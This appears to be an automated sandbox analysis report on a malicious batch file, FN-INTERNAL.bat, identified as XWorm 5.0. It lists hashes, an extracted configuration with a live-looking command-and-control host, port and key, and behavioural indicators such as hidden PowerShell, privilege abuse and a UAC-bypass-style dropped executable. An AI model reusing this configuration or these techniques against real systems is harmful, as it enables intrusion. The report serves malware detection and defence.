Analysis
-
max time kernel
1800s -
max time network
1798s -
platform
windows11-21h2_x64 -
resource
win11-20240426-en -
resource tags
arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system -
submitted
26-05-2024 14:58
Static task
static1
Behavioral task
behavioral1
Sample
FN-INTERNAL.bat
Resource
win10v2004-20240426-en
General
-
Target
FN-INTERNAL.bat
-
Size
376KB
-
MD5
121a69448e9f5eef0ba4c1229b471208
-
SHA1
90abf42b20fb75a7f922b4a83cbeb77ca5dbf5d0
-
SHA256
b383a0ab3670e505ae0b7a7b6d68c096bb799ce858d8afc2e2ef5d1c1314051a
-
SHA512
c9e903245c3ab434018e23e4c51bf9d4fcbdb9dc1b85114574c12a2ce5c3ec6cd811fa1b51a34c86c695c6ba79cade1cdc215c4953090a342ba4ff6c1a92bc3d
-
SSDEEP
6144:C+g8ai0m+BiS0FY9tRpUOAIeJxsOjzW1JlW5nHa5EV8hpzjHRQbh9xph9aK7PGaj:C+gdOSOYbRHjeJxbOJlW5niJSdT9amGk
Malware Config
Extracted
xworm
5.0
software-led.gl.at.ply.gg:38954
m6tgeOEIIMDuaFcQ
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/1588-105-0x00000241D28D0000-0x00000241D28DE000-memory.dmp family_xworm -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
svchost.exedescription pid process target process PID 3452 created 3084 3452 svchost.exe backgroundTaskHost.exe -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 2 1588 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 2068 powershell.exe 4756 powershell.exe 4568 powershell.exe 1588 powershell.exe 3124 powershell.exe 3844 powershell.exe 4736 powershell.exe -
Executes dropped EXE 1 IoCs
Processes:
ComputerDefaults.exepid process 2964 ComputerDefaults.exe -
Loads dropped DLL 1 IoCs
Processes:
ComputerDefaults.exepid process 2964 ComputerDefaults.exe -
Drops file in System32 directory 7 IoCs
Processes:
svchost.exesvchost.exedescription ioc process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Privacy-Auditing%4Operational.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe -
Processes:
Explorer.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000\Software\Microsoft\Internet Explorer\Toolbar Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" Explorer.EXE -
Modifies data under HKEY_USERS 50 IoCs
Processes:
svchost.exesvchost.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\system32\dnsapi.dll,-103 = "Domain Name System (DNS) Server Trust" svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\system32\NgcRecovery.dll,-100 = "Windows Hello Recovery Key Encryption" svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\fveui.dll,-844 = "BitLocker Data Recovery Agent" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe,-124 = "Document Encryption" svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\ci.dll,-100 = "Isolated User Mode (IUM)" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\fveui.dll,-843 = "BitLocker Drive Encryption" svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\wuaueng.dll,-400 = "Windows Update" svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\ci.dll,-101 = "Enclave" svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs svchost.exe -
Modifies registry class 64 IoCs
Processes:
Explorer.EXEsvchost.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133612107653234686" svchost.exe Set value (data) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0 = 50003100000000009a58ad80100041646d696e003c0009000400efbe9a58637aba5849782e00000057570200000001000000000000000000000000000000785ede00410064006d0069006e00000014000000 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\NodeSlot = "2" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\HAM\AUI\Global.Accounts\V1\LU svchost.exe Set value (data) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\1\0\MRUListEx = ffffffff Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\NcsiUwpApp_8wekyb3d8bbwe\HAM\AUI\App\V1 svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\LogicalViewMode = "2" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\MRUListEx = ffffffff Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\NcsiUwpApp_8wekyb3d8bbwe\HAM\AUI svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByKey:FMTID = "{30C8EEF4-A832-41E2-AB32-E3C3CA28FD29}" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\MRUListEx = 00000000ffffffff Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\NcsiUwpApp_8wekyb3d8bbwe\HAM\AUI\App\V1\LU svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\SniffedFolderType = "Generic" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\1\0\NodeSlot = "5" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\1\MRUListEx = ffffffff Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\1 = 50003100000000009a58297c10004c6f63616c003c0009000400efbe9a58637aba5849782e000000765702000000010000000000000000000000000000009aa861004c006f00630061006c00000014000000 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\NcsiUwpApp_8wekyb3d8bbwe\HAM\AUI\App\V1\LU\PTT = "133612107500891326" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByKey:PID = "2" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133612107262453556" svchost.exe Set value (data) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0 = 78003100000000009a58637a1100557365727300640009000400efbec5522d60ba5849782e0000006c0500000000010000000000000000003a0000000000ffccd70055007300650072007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100380031003300000014000000 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = 00000000ffffffff Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0 = 5600310000000000ba584c781000526f616d696e6700400009000400efbe9a58637aba584c782e00000063570200000001000000000000000000000000000000ca29930052006f0061006d0069006e006700000016000000 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\WorkFolders Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Vid = "{65F125E5-7BE1-4810-BA9D-D271C8432CE3}" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\IconSize = "48" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\1 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133612108245578466" svchost.exe Key created \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByDirection = "1" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\NodeSlot = "3" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133612107576671967" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133612107600578259" svchost.exe Key created \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0 = 56003100000000009a58637a12004170704461746100400009000400efbe9a58637aba5849782e00000062570200000001000000000000000000000000000000631cc7004100700070004400610074006100000016000000 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f80cb859f6720028040b29b5540cc05aab60000 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\MRUListEx = 00000000ffffffff Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\NcsiUwpApp_8wekyb3d8bbwe\HAM\AUI\App svchost.exe Key created \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\1\0 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\HAM\AUI\Global.IrisService\V1\LU\PTT = "133612098491985291" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\HAM\AUI\Global.Accounts\V1\LU\PTT = "133612107506360176" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Mode = "6" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\SniffedFolderType = "Generic" Explorer.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
Explorer.EXEpid process 3308 Explorer.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 4568 powershell.exe 4568 powershell.exe 3844 powershell.exe 3844 powershell.exe 1588 powershell.exe 1588 powershell.exe 4736 powershell.exe 4736 powershell.exe 3124 powershell.exe 3264 powershell.exe 3264 powershell.exe 3124 powershell.exe 2068 powershell.exe 2068 powershell.exe 1588 powershell.exe 1588 powershell.exe 1588 powershell.exe 1588 powershell.exe 1588 powershell.exe 1588 powershell.exe 1588 powershell.exe 1588 powershell.exe 1588 powershell.exe 1588 powershell.exe 1588 powershell.exe 1588 powershell.exe 1588 powershell.exe 1588 powershell.exe 1588 powershell.exe 1588 powershell.exe 1588 powershell.exe 1588 powershell.exe 1588 powershell.exe 1588 powershell.exe 1588 powershell.exe 1588 powershell.exe 1588 powershell.exe 1588 powershell.exe 1588 powershell.exe 1588 powershell.exe 1588 powershell.exe 1588 powershell.exe 1588 powershell.exe 1588 powershell.exe 1588 powershell.exe 1588 powershell.exe 2400 powershell.exe 2400 powershell.exe 1588 powershell.exe 1588 powershell.exe 1588 powershell.exe 4756 powershell.exe 1588 powershell.exe 1588 powershell.exe 1588 powershell.exe 4756 powershell.exe 1588 powershell.exe 1588 powershell.exe 1588 powershell.exe 4568 powershell.exe 4568 powershell.exe 4568 powershell.exe 4568 powershell.exe 4568 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
Processes:
Explorer.EXEpowershell.exepid process 3308 Explorer.EXE 1588 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 4568 powershell.exe Token: SeDebugPrivilege 3844 powershell.exe Token: SeDebugPrivilege 1588 powershell.exe Token: SeDebugPrivilege 4736 powershell.exe Token: SeDebugPrivilege 3124 powershell.exe Token: SeDebugPrivilege 3264 powershell.exe Token: SeIncreaseQuotaPrivilege 3264 powershell.exe Token: SeSecurityPrivilege 3264 powershell.exe Token: SeTakeOwnershipPrivilege 3264 powershell.exe Token: SeLoadDriverPrivilege 3264 powershell.exe Token: SeSystemProfilePrivilege 3264 powershell.exe Token: SeSystemtimePrivilege 3264 powershell.exe Token: SeProfSingleProcessPrivilege 3264 powershell.exe Token: SeIncBasePriorityPrivilege 3264 powershell.exe Token: SeCreatePagefilePrivilege 3264 powershell.exe Token: SeBackupPrivilege 3264 powershell.exe Token: SeRestorePrivilege 3264 powershell.exe Token: 